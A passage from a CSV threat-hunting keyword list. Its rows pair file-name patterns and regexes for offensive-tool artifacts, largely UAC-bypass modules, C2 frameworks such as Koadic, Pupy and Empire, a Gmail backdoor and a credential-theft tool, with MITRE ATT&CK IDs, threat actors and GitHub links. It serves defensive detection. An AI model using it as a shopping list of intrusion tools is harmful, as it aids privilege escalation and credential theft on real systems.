with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","36489" "*bypassuac_fodhelper*",".{0,1000}bypassuac_fodhelper.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","36490" "*bypassuac_injection*",".{0,1000}bypassuac_injection.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","36491" "*bypassuac_injection.*",".{0,1000}bypassuac_injection\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","36492" "*bypassuac_injection.rb*",".{0,1000}bypassuac_injection\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","36493" "*bypassuac_injection_winsxs.rb*",".{0,1000}bypassuac_injection_winsxs\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","36494" "*bypassuac_registry.*",".{0,1000}bypassuac_registry\..{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","36495" "*bypassuac_sdclt*",".{0,1000}bypassuac_sdclt.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","36496" "*bypassuac_silentcleanup.rb*",".{0,1000}bypassuac_silentcleanup\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","36497" "*bypassuac_slui*",".{0,1000}bypassuac_slui.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","36498" "*bypassuac_sluihijack.*",".{0,1000}bypassuac_sluihijack\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","36499" "*bypassuac_systempropertiesadvanced*",".{0,1000}bypassuac_systempropertiesadvanced.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","36500" "*bypassuac_token_imp.*",".{0,1000}bypassuac_token_imp\..{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","36501" "*bypassuac_vbs.*",".{0,1000}bypassuac_vbs\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. 
exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","36502" "*bypassuac_windows_store_reg.rb*",".{0,1000}bypassuac_windows_store_reg\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","36503" "*bypassuac_wsreset*",".{0,1000}bypassuac_wsreset.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","36504" "*BypassUAC-ETV.exe*",".{0,1000}BypassUAC\-ETV\.exe.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/Xiebro-Plugins","1","1","N/A","N/A","10","10","46","8","2025-02-27T09:17:31Z","2024-02-18T02:01:06Z","36505" "*BypassUACTokenManipulation*",".{0,1000}BypassUACTokenManipulation.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1122","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","36506" "*bypassuac-x64.dll*",".{0,1000}bypassuac\-x64\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","36507" "*bypassuac-x64.exe*",".{0,1000}bypassuac\-x64\.exe.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","36508" "*bypassuac-x86.dll*",".{0,1000}bypassuac\-x86\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","36509" "*bypassuac-x86.exe*",".{0,1000}bypassuac\-x86\.exe.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","36510" "*bypasswaf.jar*",".{0,1000}bypasswaf\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","network exploitation tool","N/A","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","36511" "*bypasswaf.jar*",".{0,1000}bypasswaf\.jar.{0,1000}","offensive_tool_keyword","bypasswaf","Add headers to all Burp requests to bypass some WAF products","T1090 - T1189 - T1001","TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/codewatchorg/bypasswaf","1","1","N/A","network exploitation tool","N/A","4","331","104","2018-01-28T13:13:39Z","2014-11-17T01:29:35Z","36512" "*bypasswaf.py*",".{0,1000}bypasswaf\.py.{0,1000}","offensive_tool_keyword","bypasswaf","Add headers to all Burp requests to bypass some WAF products","T1090 - T1189 - T1001","TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/codewatchorg/bypasswaf","1","1","N/A","network exploitation tool","N/A","4","331","104","2018-01-28T13:13:39Z","2014-11-17T01:29:35Z","36513" "*byt3bl33d3r/BOF-Nim*",".{0,1000}byt3bl33d3r\/BOF\-Nim.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF 
Files with Nim!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/byt3bl33d3r/BOF-Nim","1","1","N/A","N/A","10","10","84","13","2022-07-10T22:12:10Z","2021-01-12T18:58:23Z","36514" "*byt3bl33d3r/DeathStar*",".{0,1000}byt3bl33d3r\/DeathStar.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential 
Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","36515" "*byt3bl33d3r/dnschef-ng*",".{0,1000}byt3bl33d3r\/dnschef\-ng.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","1","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","36516" "*byt3bl33d3r/gcat*",".{0,1000}byt3bl33d3r\/gcat.{0,1000}","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","Sandworm","C2","https://github.com/byt3bl33d3r/gcat","1","1","N/A","N/A","10","10","1332","425","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z","36517" "*byt3bl33d3r/ItWasAllADream*",".{0,1000}byt3bl33d3r\/ItWasAllADream.{0,1000}","offensive_tool_keyword","ItWasAllADream","A PrintNightmare (CVE-2021-34527) Python Scanner. 
